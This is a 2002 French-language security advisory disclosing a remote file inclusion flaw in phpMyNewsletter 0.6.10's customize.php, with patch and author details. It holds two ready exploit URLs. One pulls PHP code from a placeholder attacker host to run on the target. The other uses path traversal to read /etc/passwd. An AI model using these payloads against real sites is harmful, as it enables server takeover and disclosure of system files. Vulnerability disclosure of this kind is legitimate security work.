phpMyNewsletter *************** Informations : °°°°°°°°°°°°°° Langage : PHP Tested version : 0.6.10 Website : http://gregory.kokanosky.free.fr/phpmynewsletter/ Problème : Inclusion de fichiers Developpement : °°°°°°°°°°°°°°° phpMyNewsletter est un script de newsletters où les users peuvent s'inscrire. Il y a aussi un choix de langues et une partie administrative. Dans le dossier /include/ se trouve le fichier customize.php dont les 5 premières lignes sont les suivantes : -------------------- -------------------- On peut donc faire executer n'importe quel code PHP avec les droits et restrictions du serveur, puisqu'on peut inclure un fichier externe. Par exemple : http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World avec http://[attacker]/code.txt qui contient la ligne On peut aussi visualiser directement un fichier local, par exemple : http://[target]/include/customize.php?l=../../../../etc/passwd Note : J'avais déjà écris sur une faille phpMyNewsletter, la version 0.6.6. Il date du 11/02/02 et se nomme "Failles cookies dans 4 services PHP." (4cookieholes.txt). Patch : °°°°°°° La version 0.7beta1a ne semble pas affectée. Credits : °°°°°°°°° Auteur : frog-m@n E-mail : leseulfrog@hotmail.com Website : http://www.frog-man.org Date : 25/09/02